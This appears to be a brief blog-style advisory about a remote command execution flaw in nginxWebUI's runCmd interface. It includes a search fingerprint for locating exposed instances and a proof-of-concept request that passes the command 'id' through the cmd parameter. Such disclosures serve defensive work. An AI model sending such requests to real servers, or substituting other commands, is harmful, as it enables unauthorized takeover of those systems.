Nginxwebui Runcmd Remote Command Execution Vulnerability
Nginxwebui Runcmd Remote Command Execution Vulnerability
nginxWebUI runCmd remote command execution vulnerability
Vulnerability Description
There is a remote command execution vulnerability in the nginxWebUI runCmd interface. The attacker can obtain server permissions and execute any commands through the vulnerability.
Vulnerability Impact
nginxWebUI
Network surveying and mapping
title=”nginxwebui”
Vulnerability reappears
Login page
Verify the request package
1
/AdminPage/conf/runCmd?cmd=id
This post is licensed under CC BY 4.0 by the author.